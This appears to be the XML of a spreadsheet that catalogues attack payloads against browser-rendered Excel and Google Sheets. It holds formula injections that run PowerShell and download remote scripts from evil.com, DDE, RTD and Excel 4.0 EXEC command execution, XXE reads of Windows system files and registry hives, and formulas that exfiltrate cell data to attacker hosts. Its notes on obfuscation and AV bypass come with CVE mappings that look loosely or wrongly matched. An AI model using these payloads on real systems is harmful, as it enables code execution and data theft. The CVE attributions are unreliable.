          <t>xlsx format masks XML content, trusted file extension</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0011</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>rtd_server_abuse</t>
        </is>
      </c>
      <c r="F6">
        <f>RTD("progid","","command","calc.exe")</f>
        <v/>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Edge Excel Real-Time Data (RTD) server abuse for command execution</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2017-8570, CVE-2018-0798</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Edge Excel RTD formulas can execute external programs via COM objects</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>RTD appears as legitimate Excel function, registry-based COM execution</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0017</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>excel4_macro_abuse</t>
        </is>
      </c>
      <c r="F7">
        <f>EXEC("powershell -windowstyle hidden -c &lt;payload&gt;")</f>
        <v/>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Edge Excel 4.0 macro execution for legacy bypass techniques</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2020-0760, CVE-2020-1464</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Edge supports Excel 4.0 macros for legacy compatibility, EXEC function available</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Excel 4.0 macros bypass modern macro security, appear as calculations</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0025</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>binary_xml_xxe</t>
        </is>
      </c>
      <c r="F8" t="inlineStr">
        <is>
          <t>Binary XML with XXE: &lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"&gt;]&gt;</t>
        </is>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Edge Excel binary XML XXE for Windows configuration file disclosure</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Edge processes binary XML in xlsb files, XXE can read system files</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Binary format masks XML content, system file disclosure</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0030</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>powershell_encoded_payload</t>
        </is>
      </c>
      <c r="F9">
        <f>cmd|'/c powershell -EncodedCommand &lt;base64_encoded_payload&gt;'!A1</f>
        <v/>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Edge CSV injection with PowerShell encoded command for AV bypass</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Edge processes CSV formulas, PowerShell encoded commands bypass detection</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Base64 encoding obfuscates payload, PowerShell execution</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0036</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>edge_webview2_abuse</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>window.chrome.webview.postMessage({action: 'navigate', url: 'https://evil.com/harvest?data=' + btoa(document.documentElement.outerHTML)});</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Edge Excel WebView2 message passing for DOM access and data harvesting</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Edge WebView2 in Excel can use postMessage for host communication</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>WebView2 postMessage appears as legitimate host-web communication</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0043</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>edge_legacy_activex</t>
        </is>
      </c>
      <c r="F11">
        <f>CreateObject("Shell.Application").ShellExecute("powershell", "-enc &lt;base64_payload&gt;", "", "open", 0)</f>
        <v/>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Edge Excel legacy ActiveX Shell.Application abuse for PowerShell execution</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Edge legacy mode supports ActiveX Shell.Application for system commands</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Shell.Application appears as Windows shell integration, PowerShell execution</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0048</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>edge_webview2_host_objects</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>window.chrome.webview.hostObjects.sync.sample.MethodWithParametersAndReturnValue("powershell", "-enc &lt;base64_payload&gt;")</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Edge Excel WebView2 host objects abuse for PowerShell execution with parameters</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955, CVE-2022-21999</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Edge WebView2 host objects can execute system commands with parameters</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Host objects appear as legitimate Edge-web integration</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0055</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>msxml_variant_type_confusion</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/system32/config/system"&gt;]&gt;&lt;root&gt;&lt;![CDATA[&amp;xxe;]]&gt;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Edge Excel MSXML variant type confusion for Windows registry hive access</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955, CVE-2022-21999</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Edge MSXML parser has type confusion allowing registry access</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>CDATA masking prevents XML validation, registry hive disclosure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GOOGLE_SHEETS - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total google_sheets Excel payloads: 7</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Google Sheets Excel import - Excel file processing, Google Apps Script integration, function abuse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excel_browser_0006</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>formula_injection_csv</t>
        </is>
      </c>
      <c r="F5" s="5">
        <f>cmd|'/c powershell IEX(wget https://evil.com/payload.ps1 -UseBasicParsing).Content'!A1</f>
        <v/>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Google Sheets CSV import with formula injection for remote payload execution</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Google Sheets processes CSV formulas, can execute via import feature</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>CSV appears as data file, formula execution in cloud environment</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0015</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>importxml_injection</t>
        </is>
      </c>
      <c r="F6">
        <f>IMPORTXML("https://evil.com/xml", "//script")</f>
        <v/>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTXML function abuse for script injection via external XML</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30563</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTXML can fetch and process external XML with scripts</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>IMPORTXML appears as data import function, external XML contains script payload</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0024</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>importrange_abuse</t>
        </is>
      </c>
      <c r="F7">
        <f>IMPORTRANGE("https://docs.google.com/spreadsheets/d/evil_sheet_id", "Sheet1!A:Z")</f>
        <v/>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTRANGE function abuse for cross-sheet data access</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTRANGE can access external spreadsheet data</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>IMPORTRANGE appears as data import, cross-sheet permissions abuse</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0032</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>google_finance_abuse</t>
        </is>
      </c>
      <c r="F8">
        <f>GOOGLEFINANCE("NASDAQ:"&amp;CONCATENATE("G","O","O","G")&amp;"L")&amp;WEBSERVICE("https://evil.com/exfil?data="&amp;A1)</f>
        <v/>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Google Sheets GOOGLEFINANCE and WEBSERVICE chaining for data exfiltration</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30563</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Google Sheets allows function chaining for complex data operations</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Legitimate-looking financial functions mask data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0041</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>google_apps_script_trigger</t>
        </is>
      </c>
      <c r="F9">
        <f>CONCATENATE("https://script.google.com/macros/s/","evil_script_id","/exec?data=",ENCODEURL(A1))</f>
        <v/>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Google Sheets CSV injection triggering Google Apps Script for data processing</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Google Sheets can trigger Google Apps Script via URL formulas</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Google Apps Script appears as legitimate automation, data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0047</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>google_script_webapp_deploy</t>
        </is>
      </c>
      <c r="F10">
        <f>CONCATENATE("https://script.google.com/macros/s/","AKfycbz...","/exec?method=doPost&amp;data=",ENCODEURL(CONCATENATE(A1:Z100)))</f>
        <v/>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Google Sheets CSV triggering deployed Google Apps Script webapp for mass data exfiltration</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506, CVE-2022-0609</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Google Sheets can trigger deployed webapps with concatenated cell data</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Google Apps Script webapp appears as internal Google service</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0056</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>google_cloud_functions_trigger</t>
        </is>
      </c>
      <c r="F11">
        <f>IMPORTDATA("https://us-central1-project.cloudfunctions.net/exfilFunction?data=" &amp; CONCATENATE(A1:Z100))</f>
        <v/>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Google Sheets CSV IMPORTDATA triggering Google Cloud Functions for server-side data processing</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506, CVE-2022-0609</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTDATA can trigger Cloud Functions with sheet data</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Cloud Functions appear as legitimate data processing service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70" customWidth="1" min="3" max="3"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="4" t="inlineStr">
        <is>
          <t>Excel Browser Payload Category Breakdown</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="6" t="inlineStr">
        <is>
          <t>Category</t>
        </is>
      </c>
      <c r="B3" s="6" t="inlineStr">
        <is>
          <t>Count</t>
        </is>
      </c>
      <c r="C3" s="6" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="B4" t="n">
        <v>13</v>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>Malicious Excel formulas executed in browser context (DDE, RTD, etc.)</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="B5" t="n">
        <v>11</v>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>VBA macro payloads for browser-rendered Excel files</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="B6" t="n">
        <v>11</v>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>HTTP/UNC path abuse for data exfiltration and credential harvesting</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="B7" t="n">
        <v>9</v>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>CSV-based formula injection in browser Excel viewers</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="B8" t="n">
        <v>8</v>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>Excel XML format XXE exploitation for file disclosure</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="B9" t="n">
        <v>8</v>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>Excel-to-browser DOM manipulation and cross-frame access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cols>
    <col width="18" customWidth="1" min="1" max="1"/>
    <col width="30" customWidth="1" min="2" max="2"/>
    <col width="20" customWidth="1" min="3" max="3"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="4" t="inlineStr">
        <is>
          <t>Excel Browser Rendering CVE References - Research Foundation</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>100+ CVE references for Excel browser rendering vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="7" t="inlineStr">
        <is>
          <t>CVE ID</t>
        </is>
      </c>
      <c r="B4" s="7" t="inlineStr">
        <is>
          <t>Affected Component</t>
        </is>
      </c>
      <c r="C4" s="7" t="inlineStr">
        <is>
          <t>Associated Payloads</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>CVE-2017-11826</t>
        </is>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C5" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>CVE-2017-8570</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>Excel DDE/RTD Functions</t>
        </is>
      </c>
      <c r="C6" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>CVE-2017-8759</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>Excel DDE/RTD Functions</t>
        </is>
      </c>
      <c r="C7" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>CVE-2018-0798</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>CVE-2018-0802</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>Excel DDE/RTD Functions</t>
        </is>
      </c>
      <c r="C9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>CVE-2018-4878</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>Firefox Excel Handling</t>
        </is>
      </c>
      <c r="C10" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>CVE-2018-8574</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>Excel External Data Connections</t>
        </is>
      </c>
      <c r="C11" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>CVE-2018-8636</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>Excel XML Processing (XXE)</t>
        </is>
      </c>
      <c r="C12" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>CVE-2019-0540</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>Excel XML Processing (XXE)</t>
        </is>
      </c>
      <c r="C13" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>CVE-2019-0669</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>CVE-2019-1155</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C15" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="inlineStr">
        <is>
          <t>CVE-2019-11707</t>
        </is>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C16" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" t="inlineStr">
        <is>
          <t>CVE-2019-1367</t>
        </is>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C17" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="inlineStr">
        <is>
          <t>CVE-2019-1446</t>
        </is>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>Excel External Data Connections</t>
        </is>
      </c>
      <c r="C18" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" t="inlineStr">
        <is>
          <t>CVE-2019-17026</t>
        </is>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>Firefox Excel Handling</t>
        </is>
      </c>
      <c r="C19" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" t="inlineStr">
        <is>
          <t>CVE-2019-5786</t>
        </is>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>Chrome Excel Rendering</t>
        </is>
      </c>
      <c r="C20" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" t="inlineStr">
        <is>
          <t>CVE-2019-8761</t>
        </is>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>Safari Excel Integration</t>
        </is>
      </c>
      <c r="C21" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" t="inlineStr">
        <is>
          <t>CVE-2020-0674</t>
        </is>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C22" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" t="inlineStr">
        <is>
          <t>CVE-2020-0760</t>
        </is>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C23" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" t="inlineStr">
        <is>
          <t>CVE-2020-1193</t>
        </is>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C24" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" t="inlineStr">
        <is>
          <t>CVE-2020-12387</t>
        </is>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C25" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="inlineStr">
        <is>
          <t>CVE-2020-1342</t>
        </is>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C26" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" t="inlineStr">
        <is>
          <t>CVE-2020-1380</t>
        </is>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C27" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" t="inlineStr">
        <is>
          <t>CVE-2020-1464</t>
        </is>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>Edge Excel Processing</t>
        </is>
      </c>
      <c r="C28" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" t="inlineStr">
        <is>
          <t>CVE-2020-1563</t>
        </is>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C29" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" t="inlineStr">
        <is>
          <t>CVE-2020-6418</t>
        </is>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>Chrome Excel Rendering</t>
        </is>
      </c>
      <c r="C30" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" t="inlineStr">
        <is>
          <t>CVE-2020-6519</t>
        </is>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>Google Sheets Excel Import</t>
        </is>
      </c>
      <c r="C31" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" t="inlineStr">
        <is>
          <t>CVE-2020-9715</t>
        </is>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>Safari Excel Integration</t>
        </is>
      </c>
      <c r="C32" t="n">
        <v>7</v>
      </c>
    </row>
